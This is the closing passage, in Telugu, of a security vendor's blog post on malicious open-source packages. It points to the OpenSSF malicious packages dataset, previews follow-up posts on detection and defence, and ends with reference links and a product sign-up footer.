విశ్లేషణ కోసం పరిశోధన నమూనా డేటాబేస్‌లు మరియు డేటాసెట్‌లు ఉన్నాయి (మేము వాటిలో కొన్నింటిని ఉపయోగిస్తాము), కానీ హానికరమైన ప్యాకేజీ గురించి తెలిసినప్పుడు మాత్రమే ఎంట్రీలు నవీకరించబడతాయి, అప్పటికి చాలా ఆలస్యం అయిపోతుంది. మీకు ఆసక్తి ఉంటే, OpenSSF హానికరమైన ప్యాకేజీలు ఇది మంచి ప్రారంభం.

తదుపరి పోస్ట్‌లో, ఇచ్చిన ప్యాకేజీ హానికరమైనదో కాదో ఎలా తెలుసుకోవాలో చర్చిస్తాము. ముందుగానే చెబుతున్నాం: అవును, రిజిస్ట్రీ ఒక తెలిసిన హానికరమైన భాగాన్ని తొలగించడానికి ముందే, ఎక్స్‌పోజర్ విండో ప్రారంభ దశలోనే హానికరమైన భాగాలను తనిఖీ చేయడానికి మార్గాలు ఉన్నాయి.

మరింత చదవడానికి

తదుపరి ఎపిసోడ్‌లో “ఓపెన్ సోర్స్ హానికరమైన ప్యాకేజీల నుండి రక్షణ: ఏది (పనిచేయదు)" ఓపెన్-సోర్స్ భద్రతకు సంబంధించి చేయవలసినవి మరియు చేయకూడని వాటి గురించి మనం చర్చిస్తాము. భద్రతపై అవగాహన ఉన్న చాలా మంది నిపుణులకు ఈ ముప్పును ఎలా ఎదుర్కోవాలో అనే దానిపై అవగాహన ఉంటుంది, కానీ అపోహలు మాత్రం విపరీతంగా ఉన్నాయి. 

ఈ ఆలోచనలు ఎందుకు తప్పు అని, మరియు అటువంటి అపోహలు ఈ దాడి విధానం యొక్క ప్రాచుర్యానికి, అలాగే సంస్థలు ఎదుర్కొంటున్న అపారమైన ప్రమాదానికి ఎలా దోహదపడుతున్నాయో మనం సమీక్షిస్తాము. ఆ తర్వాత, ఏది పనిచేస్తుందో, మరియు దానికి అవసరమైన కృషి మరియు వనరులు ఏమిటో చర్చిస్తాము. 

అలాగే, హానికరమైన ప్యాకేజీల ఉద్దేశ్యం, వాటిని చొప్పించే విధానం మరియు దాడి చేసే పద్ధతుల పరంగా వాటి పరిణామం గురించి కూడా మేము పోస్ట్ చేయబోతున్నాము.

చూస్తూ ఉండండి!

ప్రస్తావనలు

ఓపెన్ సోర్స్ హానికరమైన ప్యాకేజీలు: సమస్య

OSS హానికరమైన ప్యాకేజీల నుండి రక్షణ: ఏది (పనిచేయదు)

sca-tools-software-composition-analysis-tools
మీ సాఫ్ట్‌వేర్ ప్రమాదాలకు ప్రాధాన్యత ఇవ్వండి, వాటిని పరిష్కరించండి మరియు సురక్షితం చేయండి.
మీ ఉచిత ఖాతాను పొందండి.
క్రెడిట్ కార్డ్ అవసరం లేదు.

మీ సాఫ్ట్‌వేర్ అభివృద్ధి మరియు డెలివరీని సురక్షితం చేసుకోండి

Xygeni ఉత్పత్తి శ్రేణితో